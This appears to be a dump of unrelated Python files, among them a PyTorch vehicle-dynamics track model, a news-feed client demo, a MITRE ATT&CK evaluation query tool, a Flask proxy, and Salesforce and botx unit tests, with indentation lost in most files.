blend_ratio = (x[:,3] - 0.3)/(0.2)
# lambda_blend = np.min([np.max([blend_ratio,0]),1])
blend_max = torch.max(torch.cat([blend_ratio.view(-1,1), torch.zeros(blend_ratio.size(0),1)],dim=1),dim=1)
blend_min = torch.min(torch.cat([blend_max.values.view(-1, 1), torch.ones(blend_max.values.size(0), 1)], dim=1), dim=1)
lambda_blend = blend_min.values
# print(lambda_blend)
u = u_unclipped
# u[:,0] = torch.clamp(u_unclipped[:,0],-0.2,1) #
# u[:,1] = torch.clamp(u_unclipped[:,1],-0.35,0.35) # steering angle
u[:,0] = torch.clamp(u_unclipped[:,0],-1,1) #
u[:,1] = torch.clamp(u_unclipped[:,1],-1,1) # steering angle
# u[:, 0] = u[:, 0]*1.2/2 + 0.4 #(-0.2,1)
# u[:, 1] = u[:, 1] * 0.35 #(-0.35,035)
v_x = x[:,3]
v_y = x[:, 4]
x_kin = torch.cat([x[:,0:3], torch.sqrt(v_x*v_x + v_y*v_y).reshape(-1,1)],dim =1)
k1 = self.dxkin(x_kin, u).to(self.device)
k2 = self.dxkin(x_kin + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxkin(x_kin + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxkin(x_kin + self.Ts * k3, u).to(self.device)
x_kin_state = x_kin + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
delta = u[:, 1]
beta = torch.atan(self.l_r * torch.tan(delta) / (self.l_f + self.l_r))
v_x_state = x_kin_state[:,3] * torch.cos(beta) # V*cos(beta)
v_y_state = x_kin_state[:,3] * torch.sin(beta) # V*sin(beta)
yawrate_state = v_x_state * torch.tan(delta)/(self.l_f + self.l_r)
x_kin_full = torch.cat([x_kin_state[:,0:3],v_x_state.view(-1,1),v_y_state.view(-1,1), yawrate_state.view(-1,1)],dim =1)
k1 = self.dxCurve(x, u).to(self.device)
k2 = self.dxCurve(x + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxCurve(x + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxCurve(x + self.Ts * k3, u).to(self.device)
x_dyn = x + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
return (x_dyn.transpose(0,1)*lambda_blend + x_kin_full.transpose(0,1)*(1-lambda_blend)).transpose(0,1)
def dxkin(self, x, u):
fkin = torch.empty(x.size(0), 4)
s = x[:,0] #progress
d = x[:,1] #horizontal displacement
mu = x[:, 2] #orientation
v = x[:, 3]
delta = u[:, 1]
kappa = self.getCurvature(s)
beta = torch.atan(self.l_r*torch.tan(delta)/(self.l_f + self.l_r))
fkin[:, 0] = (v*torch.cos(beta + mu))/(1.0 - kappa*d) # s_dot
fkin[:, 1] = v*torch.sin(beta + mu) # d_dot
fkin[:, 2] = v*torch.sin(beta)/self.l_r - kappa*(v*torch.cos(beta + mu))/(1.0 - kappa*d)
slow_ind = v<=0.1
D_0 = (self.Cr0 + self.Cr2*v*v)/(self.Cm1 - self.Cm2 * v)
D_slow = torch.max(D_0,u[:,0])
D_fast = u[:,0]
D = D_slow*slow_ind + D_fast*(~slow_ind)
fkin[:, 3] = 1 / self.mass_long * (self.Cm1 * D - self.Cm2 * v * D - self.Cr0 - self.Cr2*v*v)
return fkin
def dxCurve_blend(self, x, u):
f = torch.empty(self.n_batch, self.n_full_state)
s = x[:,0] #progress
d = x[:,1] #horizontal displacement
mu = x[:, 2] #orientation
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5] #yawrate
delta = u[:, 1]
r_tar = delta * v_x / (self.l_f + self.l_r)
blend_ratio = (v_x - 0.3)/(0.2)
lambda_blend = np.min([np.max([blend_ratio,0]),1])
kappa = self.getCurvature(s)
if lambda_blend<1:
fkin = torch.empty(self.n_batch, self.n_full_state)
v = np.sqrt(v_x*v_x + v_y*v_y)
            beta = torch.atan(self.l_r * torch.tan(delta) / (self.l_f + self.l_r))
fkin[:, 0] = (v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d) # s_dot
fkin[:, 1] = v_x * torch.sin(mu) + v_y * torch.cos(mu) # d_dot
fkin[:, 2] = v*torch.sin(beta)/self.l_r - kappa*((v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d))
v_dot = 1 / self.mass_long * (self.Cm1 * u[:, 0] - self.Cm2 * v_x * u[:, 0])
fkin[:, 3] = 1 / self.mass_long * (self.Cm1 * u[:, 0] - self.Cm2 * v_x * u[:, 0])
fkin[:, 4] = delta * fkin[:, 3] * self.l_r / (self.l_r + self.l_f)
fkin[:, 5] = delta * fkin[:, 3] / (self.l_r + self.l_f)
if lambda_blend ==0:
return fkin
if lambda_blend>0:
[F_rx, F_ry, F_fy] = self.forceModel(x, u)
f[:, 0] = (v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d)
f[:, 1] = v_x * torch.sin(mu) + v_y * torch.cos(mu)
f[:, 2] = r - kappa*((v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d))
f[:, 3] = 1 / self.mass_long * (F_rx - F_fy * torch.sin(delta) + self.mass * v_y * r)
f[:, 4] = 1 / self.mass * (F_ry + F_fy * torch.cos(delta) - self.mass * v_x * r)
f[:, 5] = 1 / self.I_z * (F_fy * self.l_f * torch.cos(delta) - F_ry * self.l_r + self.tv_p * (r_tar - r))
if lambda_blend ==1:
return f
return f*lambda_blend + (1-lambda_blend)*fkin
def dxCurve(self, x, u):
f = torch.empty(x.size(0), self.n_full_state)
s = x[:,0] #progress
d = x[:,1] #horizontal displacement
mu = x[:, 2] #orientation
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5] #yawrate
delta = u[:, 1]
r_tar = delta * v_x / (self.l_f + self.l_r)
[F_rx, F_ry, F_fy] = self.forceModel(x, u)
kappa = self.getCurvature(s)
f[:, 0] = (v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d)
f[:, 1] = v_x * torch.sin(mu) + v_y * torch.cos(mu)
f[:, 2] = r - kappa*((v_x * torch.cos(mu) - v_y * torch.sin(mu))/(1.0 - kappa*d))
f[:, 3] = 1 / self.mass_long * (F_rx - F_fy * torch.sin(delta) + self.mass * v_y * r)
f[:, 4] = 1 / self.mass * (F_ry + F_fy * torch.cos(delta) - self.mass * v_x * r)
f[:, 5] = 1 / self.I_z * (F_fy * self.l_f * torch.cos(delta) - F_ry * self.l_r + self.tv_p * (r_tar - r))
return f
def fromStoIndexBatch(self,s_in):
s = s_in
i_nan = (s != s)
i_nan += (s >= 1e10) + (s <= -1e10)
if torch.sum(i_nan) > 0:
for i in range(self.n_batch):
if i_nan[i]:
s[i] = 0
# s[i_nan] = torch.zeros(torch.sum(i_nan))
k = 0
if torch.max(s) > self.track_s[-1] or torch.min(s) < 0:
s = torch.fmod(s,self.track_s[-1])
# i_wrapdown = (s > self.track_s[-1]).type(torch.FloatTensor)
i_wrapup = (s < 0).type(torch.FloatTensor)
s = s + i_wrapup * self.track_s[-1]
if torch.max(s) > self.track_s[-1] or torch.min(s) < 0:
s = torch.max(s, torch.zeros(self.n_batch))
s = torch.min(s, self.track_s[-1] * torch.ones(self.n_batch))
# print(s-s_in)
index = (torch.floor(s / self.track.diff_s)).type(torch.LongTensor)
if torch.min(index) < 0:
print(index)
rela_proj = (s - self.track_s[index]) / self.track.diff_s
next_index = index + 1
i_index_wrap = (next_index < self.track.N).type(torch.LongTensor)
next_index = torch.fmod(next_index,self.track.N)# * i_index_wrap
return index, next_index, rela_proj
def getCurvature(self, s):
index, next_index, rela_proj = self.fromStoIndexBatch(s)
kappa = self.track_kappa[index] + rela_proj * (self.track_kappa[next_index] - self.track_kappa[index])
return kappa
def getTrackHeading(self,s):
index, next_index, rela_proj = self.fromStoIndexBatch(s)
phi = self.track_phi[index] + rela_proj * (self.track_phi[next_index] - self.track_phi[index])
return phi
def getLocalBounds(self,s):
index, next_index, rela_proj = self.fromStoIndexBatch(s)
d_upper = self.track_d_upper[index] + \
rela_proj * (self.track_d_upper[next_index] - self.track_d_upper[index])
d_lower = self.track_d_lower[index] +\
rela_proj * (self.track_d_lower[next_index] - self.track_d_lower[index])
angle_upper = self.track_angle_upper[index] + \
rela_proj * (self.track_angle_upper[next_index] - self.track_angle_upper[index])
angle_lower = self.track_angle_lower[index] + \
rela_proj * (self.track_angle_lower[next_index] - self.track_angle_lower[index])
return d_upper, d_lower,angle_upper,angle_lower
def fromLocalToGlobal(self,state_local,phi_ref):
s = state_local[:,0]
d = state_local[:,1]
mu = state_local[:,2]
v_x = state_local[:, 3]
v_y = state_local[:, 4]
r = state_local[:, 5]
index, next_index, rela_proj = self.fromStoIndexBatch(s)
vec_track = torch.empty(self.n_batch,2)
vec_track[:, 0] = (self.track_X[next_index] - self.track_X[index])* rela_proj
vec_track[:, 1] = (self.track_Y[next_index] - self.track_Y[index])* rela_proj
pos_index = torch.empty(self.n_batch,2)
pos_index[:, 0] = self.track_X[index]
pos_index[:, 1] = self.track_Y[index]
pos_center = pos_index + vec_track
phi_0 = self.track_phi[index]
# phi_1 = self.track_phi[next_index]
phi = phi_0
# phi = self.getTrackHeading(s)#self.track_phi[index] + rela_proj * (self.track_phi[next_index] - self.track_phi[index])
pos_global = torch.empty(self.n_batch,2)
pos_global[:, 0] = pos_center[:, 0] - d * torch.sin(phi)
pos_global[:, 1] = pos_center[:, 1] + d * torch.cos(phi)
heading = phi + mu
# heading = torch.fmod(heading,2*np.pi)
upwrap_index = ((phi_ref - heading)>1.5*np.pi).type(torch.FloatTensor)
downwrap_index = ((phi_ref - heading)<-1.5*np.pi).type(torch.FloatTensor)
heading = heading - 2*np.pi*downwrap_index + 2*np.pi*upwrap_index
upwrap_index = ((phi_ref - heading) > 1.5 * np.pi).type(torch.FloatTensor)
downwrap_index = ((phi_ref - heading) < -1.5 * np.pi).type(torch.FloatTensor)
heading = heading - 2 * np.pi * downwrap_index + 2 * np.pi * upwrap_index
x_global = torch.empty(self.n_batch,self.n_full_state)
x_global[:, 0] = pos_global[:, 0]
x_global[:, 1] = pos_global[:, 1]
x_global[:, 2] = heading
x_global[:, 3] = v_x
x_global[:, 4] = v_y
x_global[:, 5] = r
return x_global
def fromStoIndex(self, s):
s = torch.fmod(s,self.track_s[-1])
# if s > self.track_kappa[-1]:
# s = s - self.track_kappa[-1]
if s < 0:
s = s + self.track_s[-1]
elif s != s:
s = torch.tensor(0.0)
index = (torch.floor(s / self.track.diff_s)).type(torch.LongTensor)
rela_proj = (s - self.track_s[index]) / self.track.diff_s
return [index, rela_proj]
def wrapMu(self, mu):
if mu < -np.pi:
mu = mu + 2 * np.pi
elif mu > np.pi:
mu = mu - 2 * np.pi
return mu
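# Hedged illustration (standalone, not tied to the Track/config files this class
# needs): the same classic RK4 step used in dynModel/dynModelCurve above, shown on
# the scalar ODE dx/dt = -x so the update formula can be verified in isolation.
if __name__ == "__main__":
    Ts = 0.03

    def dx_demo(x):
        return -x

    x = 1.0
    for _ in range(100):
        k1 = dx_demo(x)
        k2 = dx_demo(x + Ts / 2. * k1)
        k3 = dx_demo(x + Ts / 2. * k2)
        k4 = dx_demo(x + Ts * k3)
        x = x + Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.)
    print(x)  # close to exp(-3) ~ 0.0498 after 100 steps of 0.03 s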
|
499205
|
from pprint import pprint
from finnews.client import News
# Create a new instance of the News Client.
news_client = News()
# Grab the NASDAQ News Client.
nasdaq_news_client = news_client.nasdaq
# Grab the original content news.
content = nasdaq_news_client.original_content()
pprint(content)
# Grab the Commodity news.
content = nasdaq_news_client.commodities_feed()
pprint(content)
# Grab the IPO news.
content = nasdaq_news_client.ipos_feed()
pprint(content)
# Grab the Cryptocurrency news.
content = nasdaq_news_client.cryptocurrency_feed()
pprint(content)
# Grab the Dividends news.
content = nasdaq_news_client.dividends_feed()
pprint(content)
# Grab the Earnings news.
content = nasdaq_news_client.earnings_feed()
pprint(content)
# Grab the ETFs news.
content = nasdaq_news_client.etfs_feed()
pprint(content)
# Grab the Markets news.
content = nasdaq_news_client.markets_feed()
pprint(content)
# Grab the Options news.
content = nasdaq_news_client.options_feed()
pprint(content)
# Grab the Stocks news.
content = nasdaq_news_client.stocks_feed()
pprint(content)
# Grab the Artificial Intelligence news.
content = nasdaq_news_client.artifical_intelligence_feed()
pprint(content)
# Grab the Blockchain news.
content = nasdaq_news_client.blockchain_feed()
pprint(content)
# Grab the Corporate Governance news.
content = nasdaq_news_client.corporate_governance_feed()
pprint(content)
# Grab the Financial Advisors news.
content = nasdaq_news_client.financial_advisors_feed()
pprint(content)
# Grab the Fin Tech news.
content = nasdaq_news_client.fin_tech_feed()
pprint(content)
# Grab the Innovation news.
content = nasdaq_news_client.innovation_feed()
pprint(content)
# Grab the Nasdaq News Inc. news. -- NOT WORKING!!!!
content = nasdaq_news_client.nasdaq_news_feed()
pprint(content)
# Grab the Technology news.
content = nasdaq_news_client.technology_feed()
pprint(content)
# Grab the Investing news.
content = nasdaq_news_client.investing_feed()
pprint(content)
# Grab the Retirement news.
content = nasdaq_news_client.retirement_feed()
pprint(content)
# Grab the Saving Money news.
content = nasdaq_news_client.saving_money_feed()
pprint(content)
# Grab news articles for AAPL.
content = nasdaq_news_client.ticker_feed(ticker_symbol='AAPL')
pprint(content)
|
499213
|
import sys
from constants import SYMBOL
from db import create_engine, fetch_dataframe, plot_stats
def main():
engine = create_engine(SYMBOL)
dataframe = fetch_dataframe(SYMBOL, engine)
if dataframe is None:
raise Exception("Unable to fetch dataframe")
if len(sys.argv) == 2 and (sys.argv[1] == "--graph" or sys.argv[1] == "-g"):
plot_stats(SYMBOL, dataframe, "Price")
else:
print(dataframe)
if __name__ == "__main__":
main()
|
499247
|
import time
def get_bitsize(v):
return 1 << v
def get_timestamp():
now = int((time.time()) * 1000)
return now
def til_next_millis(last):
timestamp = get_timestamp()
while (timestamp <= last):
time.sleep(0.001)
timestamp = get_timestamp()
return timestamp
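# Hedged usage sketch: these helpers look like building blocks for a snowflake-style
# ID generator; the demo below only exercises what is defined in this file.
if __name__ == "__main__":
    print(get_bitsize(12))               # 4096 sequence values per millisecond
    last = get_timestamp()
    print(til_next_millis(last) > last)  # True once the clock has advanced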
|
499254
|
import json
import glob
import os
import argparse
import sys
import re
class QueryAttackEval:
def __init__(self, args):
self.args = args
# this line is only to protect the object and should never trigger if running from this script
assert(self.args.technique or self.args.procedure or self.args.search)
def get_technique(self, technique_id):
print(f'{self.filename}')
technique = self.data[technique_id]
name = technique['TechniqueName']
print(f' {technique_id}: {name}')
for step_id, step in technique['Steps'].items():
if not len(step["Procedure"]):
continue
print(f' {step_id}) {step["Procedure"]}')
for detection in step['DetectionCategories']:
for k,v in detection.items():
k = k.strip()
if len(k):
print(f' {k}')
return
def get_procedure(self, procedure_id):
found_proc = False
print(f'{self.filename}')
for technique_id, technique in self.data.items():
if technique_id == 'PublicRelease':
continue
if procedure_id in technique['Steps']:
step = technique['Steps'][procedure_id]
if not len(step["Procedure"]):
continue
if not found_proc:
print(f' {procedure_id}) {step["Procedure"]}')
found_proc = True
print(f' {technique_id}: {technique["TechniqueName"]}')
for detection in step['DetectionCategories']:
for k,v in detection.items():
k = k.strip()
if len(k):
print(f' {k}')
return
def search_eval(self, substring):
techniques = []
procedures = []
detections = []
notes = []
for technique_id, technique in self.data.items():
if technique_id == 'PublicRelease':
continue
if self.args.technique and not technique_id == self.args.technique:
continue
if re.search(substring, technique['TechniqueName'], re.IGNORECASE):
techniques.append(f'{technique_id}:\t{technique["TechniqueName"]}')
for step_id, step in technique['Steps'].items():
if self.args.procedure and not step_id == self.args.procedure:
continue
if re.search(substring, step['Procedure'], re.IGNORECASE):
procedures.append('{:20}{}'.format(f'{step_id}:{technique_id})',step["Procedure"]))
for detection in step['DetectionCategories']:
for k,v in detection.items():
if re.search(substring, k, re.IGNORECASE):
                            detections.append('{:20}{}'.format(f'{step_id}:{technique_id})', k))
if re.search(substring, v, re.IGNORECASE):
notes.append('{:20}{}\t{}'.format(f'{step_id}:{technique_id})', k, v))
if len(techniques) or len(procedures) or len(detections) or len(notes):
print(f'{self.filename}')
if len(techniques):
print('\n Techniques\n ----------')
for technique in techniques:
print(f' {technique}')
if len(procedures):
print('\n Procedures\n ----------')
for procedure in procedures:
print(f' {procedure}')
if len(detections):
print('\n Detections\n ----------')
for detection in detections:
print(f' {detection}')
if len(notes):
print('\n Detection Notes\n ---------------')
for note in notes:
print(f' {note}')
return
def run(self, infile):
        if not re.search(self.args.vendor, infile, re.IGNORECASE):
return
else:
self.filename = infile
with open(self.filename) as json_data:
self.data = json.load(json_data)
if self.args.search:
self.search_eval(self.args.search)
elif self.args.technique:
self.get_technique(self.args.technique.upper())
        elif self.args.procedure:
self.get_procedure(self.args.procedure.upper())
def parse_args():
parser = argparse.ArgumentParser(
description='Query utility for the MITRE ATT&CK Evaluations'
)
parser.add_argument(
'-t',
'--technique',
type=str,
help='Query based on the supplied ATT&CK Technique (example: $ python query_attack.py -t T1043)',
default=False
)
parser.add_argument(
'-p',
'--procedure',
type=str,
help='Query based on the supplied Step/Procedure (example: $ python query_attack.py -p 1.A.1)',
default=False
)
parser.add_argument(
'-s',
'--search',
type=str,
help='Query all descriptions for the supplied substring (example: $ python query_attack.py -s ipconfig)',
default=False
)
parser.add_argument(
'vendor',
type=str,
nargs='?',
help='Optional argument to allow you to filter down to a particular vendor (example: $ python query_attack.py -s tainted countertack)',
default='.'
)
args = parser.parse_args()
if not (args.technique or args.procedure or args.search):
parser.print_help()
return False
return args
if __name__ == '__main__':
args = parse_args()
if args:
attack = QueryAttackEval(args)
for infile in glob.glob(os.path.join('./data/', '*json')):
attack.run(infile)
|
499259
|
from civic_scraper.base.site import Site
def test_site_default():
"Site should receive a url"
class Example(Site):
pass
site = Example("https://foo.com")
assert hasattr(site, "url")
assert site.runtime.__class__.__name__ == "date"
assert not hasattr(site, "parser_kls")
def test_site_with_parser():
"Site accepts optional Parser class"
class Parser:
pass
class Example(Site):
pass
site = Example("https://foo.com", parser_kls=Parser)
assert hasattr(site, "parser_kls")
|
499323
|
from abc import ABC, abstractmethod
from random import randrange
from typing import List
class Observer(ABC):
@abstractmethod
def update(self, subject):
pass
class Subject(ABC):
@abstractmethod
def append(self, observer):
pass
@abstractmethod
def remove(self, observer):
pass
@abstractmethod
def notify(self):
pass
@abstractmethod
def get_content(self):
pass
class SubjectA(Subject):
def __init__(self):
self._observers = []
self.content = None
def append(self, observer: Observer):
self._observers.append(observer)
def remove(self, observer: Observer):
self._observers.remove(observer)
def notify(self):
for observer in self._observers:
observer.update(self)
def some_business_logic(self):
self.content = randrange(0, 10)
print("Current Content is -- > {}".format(self.content))
self.notify()
def get_content(self):
return self.content
class CustomerA(Observer):
def update(self, subject: Subject):
if subject.get_content() % 2 == 0 or subject.get_content() >= 5:
print("ConcreteObserverA: Reacted to the event")
class CustomerB(Observer):
def update(self, subject: Subject):
if subject.get_content() % 2 != 0 or subject.get_content() < 5:
print("ConcreteObserverB: Reacted to the event")
if __name__ == "__main__":
subject = SubjectA()
a = CustomerA()
subject.append(a)
b = CustomerB()
subject.append(b)
subject.some_business_logic()
subject.some_business_logic()
subject.remove(a)
subject.some_business_logic()
|
499329
|
import json
import os
dir_path = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(dir_path, 'insights_hosts.json')) as data_file:
TEST_INSIGHTS_HOSTS = json.load(data_file)
with open(os.path.join(dir_path, 'insights.json')) as data_file:
TEST_INSIGHTS_PLANS = json.load(data_file)
with open(os.path.join(dir_path, 'insights_remediations.json')) as data_file:
TEST_INSIGHTS_REMEDIATIONS = json.load(data_file)['data']
|
499365
|
class QLayer():
def get_quant_weight(self):
raise NotImplementedError
def set_quant_weight(self):
raise NotImplementedError
def restore_weight(self):
raise NotImplementedError
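# Hedged sketch (assumption: QLayer is meant as an interface for quantization-aware
# layers). A minimal concrete implementation that keeps a full-precision copy of the
# weights, swaps in a fake-quantized version, and restores the original afterwards.
class UniformQLinear(QLayer):
    def __init__(self, weight, n_bits=8):
        self.weight = list(weight)
        self.n_bits = n_bits
        self._saved_weight = None

    def get_quant_weight(self):
        # Symmetric uniform (fake) quantization to n_bits signed levels.
        scale = max(abs(w) for w in self.weight) or 1.0
        q_max = 2 ** (self.n_bits - 1) - 1
        return [round(w / scale * q_max) * scale / q_max for w in self.weight]

    def set_quant_weight(self):
        self._saved_weight = list(self.weight)
        self.weight = self.get_quant_weight()

    def restore_weight(self):
        self.weight = self._saved_weight


if __name__ == "__main__":
    layer = UniformQLinear([0.31, -0.7, 0.05], n_bits=4)
    layer.set_quant_weight()
    print(layer.weight)   # fake-quantized weights used for the forward pass
    layer.restore_weight()
    print(layer.weight)   # full-precision weights back in place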
|
499386
|
from bert_nli import BertNLIModel
if __name__ == '__main__':
bert_type = 'bert-base'
model = BertNLIModel('output/{}.state_dict'.format(bert_type), bert_type=bert_type)
sent_pairs = [('The lecturer committed plagiarism.','He was promoted.')]
labels, probs = model(sent_pairs)
print(labels)
print(probs)
|
499389
|
from django.conf import settings
def vault_settings(request):
return {
'DEBUG': settings.DEBUG,
'ENVIRON': settings.ENVIRON,
'HELP_URL': settings.HELP_URL,
'SWIFT_CLOUD_ENABLED': settings.SWIFT_CLOUD_ENABLED,
}
def vault_session(request):
return {
'logged_user': request.user,
'project_id': request.session.get('project_id'),
'project_name': request.session.get('project_name'),
'auth_token': request.session.get('auth_token'),
'is_superuser': request.user.is_superuser,
}
|
499393
|
from __future__ import absolute_import
from jinja2 import Markup
from changes.buildfailures.base import BuildFailure
class MissingTests(BuildFailure):
def get_html_label(self, build):
return Markup('Tests were expected for all results, but some or all were missing.')
|
499399
|
from evoflow.config import floatx, intx
def _infer_dtype(a):
"infers what tensor.dtype to use for a given variable during conversion"
if isinstance(a, int):
dtype = intx()
elif isinstance(a, float):
dtype = floatx()
elif isinstance(a, list):
have_float = False
for v in a:
if isinstance(v, float):
have_float = True
if have_float:
dtype = floatx()
else:
dtype = intx()
else:
raise ValueError("can't cast type:", type(a), 'to a tensor')
return dtype
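# Hedged usage sketch: exercising the casting rules above. The concrete intx()/floatx()
# values depend on the evoflow configuration, so only the int-vs-float promotion
# behaviour is illustrated here.
if __name__ == "__main__":
    print(_infer_dtype(3))            # intx()
    print(_infer_dtype(3.0))          # floatx()
    print(_infer_dtype([1, 2, 3.5]))  # floatx(), promoted by the float element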
|
499400
|
import pymongo
client = pymongo.MongoClient('mongodb://172.17.0.3:27017/')
db = client['diagram']
col = db["http2Form"]
http2 = {
'header': {
'filter': False, 'fields': [], 'ShowOnMainLine': False
},
'payload': {
'filter': False, 'fields': [], 'ShowOnMainLine': False
},
}
x = col.delete_one({"_id":1})
x = col.delete_one({"_id":2})
x = col.insert_one({"_id": 1, "http2": http2})
x = col.insert_one({"_id": 2, "http2": http2})
|
499407
|
from flask import Blueprint, Response, jsonify, request
from flask_cors import CORS
import requests
import json
pars = Blueprint('pars', __name__)
CORS(pars)
@pars.route('/parser', methods=['POST'])
def PARSER():
body = request.json
res = requests.post('http://localhost:8887/Query/Parser',json = body)
return json.loads(res.text)
@pars.route('/consultar', methods=['POST'])
def CONSULTAR():
body = request.json
print(body)
res = requests.post('http://localhost:8887/Query/Consultar',json = body)
print(res.text)
return json.loads(res.text)
@pars.route('/EDD/reportTBL',methods=['POST'])
def RepReportTBL():
body = request.json
res = requests.post('http://localhost:9998/REP/reportTBL',json = body)
return json.loads(res.text)
@pars.route('/EDD/reportDB',methods=['POST'])
def RepReportDB():
res = requests.post('http://localhost:9998/REP/reportDB')
return json.loads(res.text)
@pars.route('/EDD/reportAVL',methods=['POST'])
def RepReportAVL():
body = request.json
print(body)
res = requests.post('http://localhost:9998/REP/reportAVL',json = body)
return json.loads(res.text)
@pars.route('/EDD/reportTPL',methods=['POST'])
def RepReportTPL():
body = request.json
res = requests.post('http://localhost:9998/REP/reportTPL',json = body)
return json.loads(res.text)
@pars.route('/SHTABLE', methods=['POST'])
def SHTABLE():
body = request.json
res = requests.post('http://localhost:9998/TABLE/showTables',json = body)
return json.loads(res.text)
@pars.route('/prueba', methods=['GET'])
def PRUEBA():
return jsonify({"message":"Connected"})
|
499412
|
import pytest
from salesforce_api.const.service import VERB
from . import helpers
from salesforce_api import login, core, exceptions, const
class TestOAuth:
def create_connection(self, api_version: str = None):
return login.oauth2(
client_id=helpers.TEST_CLIENT_KEY,
client_secret=helpers.TEST_CLIENT_SECRET,
username=helpers.TEST_USER_EMAIL,
password=<PASSWORD>,
instance_url=helpers.TEST_INSTANCE_URL,
api_version=api_version
)
def test_authenticate_success(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/success.txt'), status_code=200)
connection = self.create_connection()
assert isinstance(connection, core.Connection)
assert connection.access_token == helpers.TEST_ACCESS_TOKEN
def test_authenticate_client_id_failure(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/invalid_client_id.txt'), status_code=400)
with pytest.raises(exceptions.AuthenticationInvalidClientIdError):
self.create_connection()
def test_authenticate_client_secret_failure(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/invalid_client_secret.txt'), status_code=400)
with pytest.raises(exceptions.AuthenticationInvalidClientSecretError):
self.create_connection()
def test_authenticate_invalid_grant_failure(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/invalid_grant.txt'), status_code=400)
with pytest.raises(exceptions.AuthenticationError):
self.create_connection()
def test_automatic_api_version(self, requests_mock):
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/success.txt'), status_code=200)
connection = self.create_connection()
assert connection.version == const.API_VERSION
def test_manual_api_version(self, requests_mock):
expected_api_version = '123.4'
requests_mock.register_uri('POST', '/services/oauth2/token', text=helpers.get_data('login/oauth/success.txt'), status_code=200)
connection = self.create_connection(expected_api_version)
assert connection.version == expected_api_version
class TestSoap(helpers.BaseTest):
def create_connection(self, api_version: str = None):
return login.soap(
instance_url=helpers.TEST_INSTANCE_URL,
username=helpers.TEST_USER_EMAIL,
password=<PASSWORD>,
security_token=helpers.TEST_SECURITY_TOKEN,
api_version=api_version
)
def test_authenticate_success(self, requests_mock):
self.register_uri(requests_mock, VERB.POST, '/services/Soap/c/{version}', text=helpers.get_data('login/soap/success.txt'))
connection = self.create_connection()
assert isinstance(connection, core.Connection)
assert connection.access_token == helpers.TEST_ACCESS_TOKEN
def test_authenticate_alt_password_success(self, requests_mock):
self.register_uri(requests_mock, VERB.POST, '/services/Soap/c/{version}', text=helpers.get_data('login/soap/success.txt'))
connection = login.soap(
instance_url=helpers.TEST_INSTANCE_URL,
username=helpers.TEST_USER_EMAIL,
password_and_security_token=helpers.TEST_PASSWORD
)
assert isinstance(connection, core.Connection)
assert connection.access_token == helpers.TEST_ACCESS_TOKEN
def test_authenticate_missing_token_failure(self, requests_mock):
self.register_uri(requests_mock, VERB.POST, '/services/Soap/c/{version}', text=helpers.get_data('login/soap/missing_token.txt'))
with pytest.raises(exceptions.AuthenticationMissingTokenError):
self.create_connection()
def test_automatic_api_version(self, requests_mock):
self.register_uri(requests_mock, VERB.POST, '/services/Soap/c/{version}', text=helpers.get_data('login/soap/success.txt'))
assert self.create_connection().version == const.API_VERSION
def test_manual_api_version(self, requests_mock):
expected_api_version = '123.4'
self.register_uri(requests_mock, VERB.POST, f'/services/Soap/c/{expected_api_version}', text=helpers.get_data('login/soap/success.txt', {'version': expected_api_version}))
assert self.create_connection(expected_api_version).version == expected_api_version
|
499497
|
from __future__ import absolute_import, unicode_literals
from celery.utils import encoding
class test_encoding:
def test_safe_str(self):
assert encoding.safe_str(object())
assert encoding.safe_str('foo')
def test_safe_repr(self):
assert encoding.safe_repr(object())
class foo(object):
def __repr__(self):
raise ValueError('foo')
assert encoding.safe_repr(foo())
|
499517
|
import uuid
from datetime import datetime as dt, timezone as tz
from typing import List
import pytest
from botx import ChatTypes, CommandTypes, EntityTypes
from botx.models.messages.incoming_message import Command, IncomingMessage, Sender
@pytest.mark.parametrize(
("body", "command", "arguments", "single_argument"),
[
("/command", "/command", (), ""),
("/command ", "/command", (), ""),
("/command arg", "/command", ("arg",), "arg"),
("/command arg ", "/command", ("arg",), "arg"),
("/command \t\t arg ", "/command", ("arg",), "arg"),
("/command arg arg", "/command", ("arg", "arg"), "arg arg"),
("/command arg arg ", "/command", ("arg", "arg"), "arg arg"),
],
)
def test_command_splits_right(
body: str,
command: str,
arguments: List[str],
single_argument: str,
) -> None:
    built_command = Command(body=body, command_type=CommandTypes.user)
    assert built_command.body == body
    assert built_command.command == command
    assert built_command.arguments == arguments
    assert built_command.single_argument == single_argument
def test_command_data_as_dict() -> None:
command = Command(
body="/test",
command_type=CommandTypes.user,
data={"some": "data"},
)
assert command.data_dict == command.data == {"some": "data"}
def test_user_email_when_credentials_passed() -> None:
sender = Sender(
user_huid=uuid.uuid4(),
group_chat_id=uuid.uuid4(),
chat_type=ChatTypes.chat,
ad_login="user",
ad_domain="example.com",
username="test user",
is_admin=False,
is_creator=True,
host="cts.example.com",
)
assert sender.upn == "<EMAIL>"
def test_user_email_when_credentials_missed() -> None:
assert (
Sender(
group_chat_id=uuid.uuid4(),
chat_type=ChatTypes.chat,
is_admin=False,
is_creator=True,
host="cts.example.com",
).upn
is None
)
def test_skip_validation_for_file() -> None:
file_data = {"file_name": "zen.py", "data": "data:text/plain;base64,"}
IncomingMessage.parse_obj(
{
"sync_id": "a465f0f3-1354-491c-8f11-f400164295cb",
"command": {"body": "/cmd", "command_type": "user", "data": {}},
"file": file_data,
"from": {
"user_huid": None,
